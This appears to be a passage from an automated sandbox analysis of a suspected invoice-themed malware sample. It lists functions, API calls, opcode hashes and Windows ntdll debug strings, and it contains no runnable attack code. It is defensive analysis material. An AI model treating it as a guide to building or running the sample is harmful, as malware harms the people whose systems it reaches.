                                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                        • Instruction ID: 1e45151d5ae518e03348f57204b76deaae3a37f6371d957f2058fa57962241ea
                                                                                                                                        • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                        • Instruction Fuzzy Hash: A8E06DB1604244BBD614EE99DC41EAF37ACEFC6710F000019F908A7242C670B91086B9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0042B5F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                                                                        APIs
                                                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                        • Opcode ID: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                                                                        • Instruction ID: 5260f22870e994c6374de7522158ff438fff32bc85833648b073e817e0388f48
                                                                                                                                        • Opcode Fuzzy Hash: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                                                                        • Instruction Fuzzy Hash: 5EE04F72600214BBD220AA6ADC41F9B775CDFC5714F004469FA0CA7246CAB5B90186B4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 363 1032c0a-1032c0f 364 1032c11-1032c18 363->364 365 1032c1f-1032c26 LdrInitializeThunk 363->365
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 395af0aa276d53de0918bbb6dfad15a8c2feeaadf9e8c7192087de1dbfa7f343
                                                                                                                                        • Instruction ID: 360aed033d96ba6cd951f9c2f077659fb43aa4c1b7b4fcde84f11679fcdc7e69
                                                                                                                                        • Opcode Fuzzy Hash: 395af0aa276d53de0918bbb6dfad15a8c2feeaadf9e8c7192087de1dbfa7f343
                                                                                                                                        • Instruction Fuzzy Hash: 65B09B719015C5C6EA51F7A44608717794477D0701F15C472D2430641F4778D1E1E275
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 010A8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • The resource is owned shared by %d threads, xrefs: 010A8E2E
                                                                                                                                        • This failed because of error %Ix., xrefs: 010A8EF6
                                                                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010A8DC4
                                                                                                                                        • *** enter .exr %p for the exception record, xrefs: 010A8FA1
                                                                                                                                        • The critical section is owned by thread %p., xrefs: 010A8E69
                                                                                                                                        • *** then kb to get the faulting stack, xrefs: 010A8FCC
                                                                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010A8DB5
                                                                                                                                        • Go determine why that thread has not released the critical section., xrefs: 010A8E75
                                                                                                                                        • read from, xrefs: 010A8F5D, 010A8F62
                                                                                                                                        • The instruction at %p referenced memory at %p., xrefs: 010A8EE2
                                                                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010A8E3F
                                                                                                                                        • an invalid address, %p, xrefs: 010A8F7F
                                                                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010A8DD3
                                                                                                                                        • *** Inpage error in %ws:%s, xrefs: 010A8EC8
                                                                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010A8DA3
                                                                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010A8D8C
                                                                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010A8E4B
                                                                                                                                        • <unknown>, xrefs: 010A8D2E, 010A8D81, 010A8E00, 010A8E49, 010A8EC7, 010A8F3E
                                                                                                                                        • The instruction at %p tried to %s , xrefs: 010A8F66
                                                                                                                                        • The resource is owned exclusively by thread %p, xrefs: 010A8E24
                                                                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010A8E86
                                                                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010A8FEF
                                                                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010A8F2D
                                                                                                                                        • a NULL pointer, xrefs: 010A8F90
                                                                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 010A8F3F
                                                                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010A8F26
                                                                                                                                        • write to, xrefs: 010A8F56
                                                                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010A8F34
                                                                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 010A8E02
                                                                                                                                        • *** enter .cxr %p for the context, xrefs: 010A8FBD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                        • API String ID: 0-108210295
                                                                                                                                        • Opcode ID: 0bff67cf268ebf95c9a6ae3f537eccdb10099913f31e852451a60e3b8b851e76
                                                                                                                                        • Instruction ID: 41224f7044e4080a1b07c0850f7a90e14008ac3e1df7cab6b112ebe8441c3cb5
                                                                                                                                        • Opcode Fuzzy Hash: 0bff67cf268ebf95c9a6ae3f537eccdb10099913f31e852451a60e3b8b851e76
                                                                                                                                        • Instruction Fuzzy Hash: 2A813539A00242BFDB25DA598C4DEBB3F75EF56B11F408085F2446F152E3B1D502DAA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01072349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2160512332
                                                                                                                                        • Opcode ID: 1a5c37dfb09ba5453b3a54823080d9846bee4d8f83b1cbfcec24f5b3a1e8eba4
                                                                                                                                        • Instruction ID: 01e40fb7744c7e9676628a3d6565877f62cb203bf614e4ccdb59eb6c0eedbd39
                                                                                                                                        • Opcode Fuzzy Hash: 1a5c37dfb09ba5453b3a54823080d9846bee4d8f83b1cbfcec24f5b3a1e8eba4
                                                                                                                                        • Instruction Fuzzy Hash: 0992AE71A04346AFE725DF28C840BABB7E8BB84754F04492DFAD4DB291D770E844CB96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01028620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Critical section debug info address, xrefs: 0106541F, 0106552E
                                                                                                                                        • corrupted critical section, xrefs: 010654C2
                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010654E2
                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01065543
                                                                                                                                        • Critical section address, xrefs: 01065425, 010654BC, 01065534
                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010654CE
                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 010654B6
                                                                                                                                        • undeleted critical section in freed memory, xrefs: 0106542B
                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01065508
                                                                                                                                        • Thread identifier, xrefs: 0106553A
                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0106540A, 01065496, 01065519
                                                                                                                                        • Critical section address., xrefs: 01065502
                                                                                                                                        • 8, xrefs: 010652E3
                                                                                                                                        • Address of the debug info found in the active list., xrefs: 010654AE, 010654FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                        • API String ID: 0-2368682639
                                                                                                                                        • Opcode ID: ea3b6b3c46c3111175fb417ba144cdf7bc671eb3868c06df641e35991434272b
                                                                                                                                        • Instruction ID: f8a3da3c02a09c36ab0e736e309fbc3aacf8f7af3a1d10d04a41ff2894cb71f5
                                                                                                                                        • Opcode Fuzzy Hash: ea3b6b3c46c3111175fb417ba144cdf7bc671eb3868c06df641e35991434272b
                                                                                                                                        • Instruction Fuzzy Hash: 0881ABB0A00358AFDB20CF99CC45BAEBBF9AB48B44F14815AF548BB280D775A945CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010622E4
                                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010624C0
                                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01062624
                                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0106261F
                                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010625EB
                                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01062409
                                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01062506
                                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01062602
                                                                                                                                        • @, xrefs: 0106259B
                                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01062412
                                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01062498
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                        • API String ID: 0-4009184096
                                                                                                                                        • Opcode ID: 2315f5bb444a5cf0238a0d32483d07497444138d08c64c05fdadc67da84eba58
                                                                                                                                        • Instruction ID: 12223539447b960ed6b2380366af6ad78dce05940db25dee2a651840fad2635a
                                                                                                                                        • Opcode Fuzzy Hash: 2315f5bb444a5cf0238a0d32483d07497444138d08c64c05fdadc67da84eba58
                                                                                                                                        • Instruction Fuzzy Hash: ED0251B1D002299BDB71DB54CC80BDEB7B8AF54304F4441EAE689A7241EB71AE84CF59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01098B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                        • API String ID: 0-2515994595
                                                                                                                                        • Opcode ID: b14fb8cbc52b1ef0a5f2df8875b07ab30e706407cacde39a97294bac3ba3c627
                                                                                                                                        • Instruction ID: fcf6e26429eea25f8e2f257c3b0ab629b715c0b45f26b39daafcdfe16df94e2e
                                                                                                                                        • Opcode Fuzzy Hash: b14fb8cbc52b1ef0a5f2df8875b07ab30e706407cacde39a97294bac3ba3c627
                                                                                                                                        • Instruction Fuzzy Hash: 3751E7B11093495BC725DF188959BAB7BE8AF85300F14851EEAD4C3281E770D504EB92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0100AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                        • API String ID: 0-3197712848
                                                                                                                                        • Opcode ID: 5020fa8e77b97ed551ba5699a6dad7d1175cf35f6fee88591e05e94d9ebbc2f6
                                                                                                                                        • Instruction ID: 90b7ac0e2e7625dcaf5164220f4923be328ce512017d1f2c10d2d7d51c98ca99
                                                                                                                                        • Opcode Fuzzy Hash: 5020fa8e77b97ed551ba5699a6dad7d1175cf35f6fee88591e05e94d9ebbc2f6
                                                                                                                                        • Instruction Fuzzy Hash: 9812DF71608342CBE766DB29C880BABB7E5BF84704F04496EF9C58B2D1E735D944CB52
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                        • API String ID: 0-1700792311
                                                                                                                                        • Opcode ID: 31672cac190c6ac230af5793a6b3e571c6d7b7b7e6f3bfb69ee48475a46d24ee
                                                                                                                                        • Instruction ID: 3846616a65f2c57c69baa0671cc34d781847f305010fda4f2dc71de790cb03e9
                                                                                                                                        • Opcode Fuzzy Hash: 31672cac190c6ac230af5793a6b3e571c6d7b7b7e6f3bfb69ee48475a46d24ee
                                                                                                                                        • Instruction Fuzzy Hash: EFD1023190068ADFDB22DFA9C441AAEBBF1FF49704F488099F5C59B256C739E980DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • HandleTraces, xrefs: 01078C8F
                                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01078A3D
                                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01078B8F
                                                                                                                                        • VerifierDlls, xrefs: 01078CBD
                                                                                                                                        • VerifierDebug, xrefs: 01078CA5
                                                                                                                                        • VerifierFlags, xrefs: 01078C50
                                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01078A67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                        • API String ID: 0-3223716464
                                                                                                                                        • Opcode ID: 52b83c9ff32403df48efff250fdba228ad429d4e812840404e4734a603a6880b
                                                                                                                                        • Instruction ID: d41f8f2a2cf258bf1a8b0d263080349a4079bd04dbcc3bd5e0b03d32c802a347
                                                                                                                                        • Opcode Fuzzy Hash: 52b83c9ff32403df48efff250fdba228ad429d4e812840404e4734a603a6880b
                                                                                                                                        • Instruction Fuzzy Hash: 02913771E01316AFD721EF298C84B6A77E4AB54B24F04895EFAC06F281C775EC00CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01074DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01074DF5
                                                                                                                                        • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01074E38
                                                                                                                                        • LdrpProtectedCopyMemory, xrefs: 01074DF4
                                                                                                                                        • ***Exception thrown within loader***, xrefs: 01074E27
                                                                                                                                        • Execute '.cxr %p' to dump context, xrefs: 01074EB1
                                                                                                                                        • LdrpGenericExceptionFilter, xrefs: 01074DFC
                                                                                                                                        • minkernel\ntdll\ldrutil.c, xrefs: 01074E06
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                                                        • API String ID: 0-2973941816
                                                                                                                                        • Opcode ID: 3c73c24a2530516efe8fa93184988e5e2147c736d15f4fa06048b4bbefe6be29
                                                                                                                                        • Instruction ID: 6d2ff1c7cf5cf6f231a73627c77655bbd016e6bc6d99284aa737a8a61ada8d00
                                                                                                                                        • Opcode Fuzzy Hash: 3c73c24a2530516efe8fa93184988e5e2147c736d15f4fa06048b4bbefe6be29
                                                                                                                                        • Instruction Fuzzy Hash: 32218E726481067BE3289B6C9C45D3A7BDDFB85B70F180951F2E1DB681C550DE00C22A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FFEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                        • API String ID: 0-1109411897
                                                                                                                                        • Opcode ID: 58b48bcd03dcb4767a9bc319d4b7567de57462847220c841a2c6f79c052261f5
                                                                                                                                        • Instruction ID: d73b11b6db4f2849f99fcbd2444a75b08be54bc19c23e535b6ec05d9d23d4d0f
                                                                                                                                        • Opcode Fuzzy Hash: 58b48bcd03dcb4767a9bc319d4b7567de57462847220c841a2c6f79c052261f5
                                                                                                                                        • Instruction Fuzzy Hash: BBA24D75E056298FDBA4DF18C8887AEBBB1AF45314F2441E9D94DA7260EB309EC5DF00
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-792281065
                                                                                                                                        • Opcode ID: 238ea66c99addc632606eff384d9bd8a7ccd844a3b286f96e9c1163f8f532307
                                                                                                                                        • Instruction ID: c1570a651f7fa6f7e83981b1da91456e963d22317c07a0caf70ae6a9649b2e29
                                                                                                                                        • Opcode Fuzzy Hash: 238ea66c99addc632606eff384d9bd8a7ccd844a3b286f96e9c1163f8f532307
                                                                                                                                        • Instruction Fuzzy Hash: A9912470B00326DBEB35DF59D844BAE7BE9BB50B18F140169E9C0AF2C1DB769841C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FE645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01049A11, 01049A3A
                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010499ED
                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01049A01
                                                                                                                                        • apphelp.dll, xrefs: 00FE6496
                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01049A2A
                                                                                                                                        • LdrpInitShimEngine, xrefs: 010499F4, 01049A07, 01049A30
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                        • Opcode ID: bc5a14386a02a523af7e92742fdff6c37659b58d6af4c8695685f53542952242
                                                                                                                                        • Instruction ID: c7af4a6ac7f4aa426cb51a8b05798e707245c686c74a9f145404801bbfcd606e
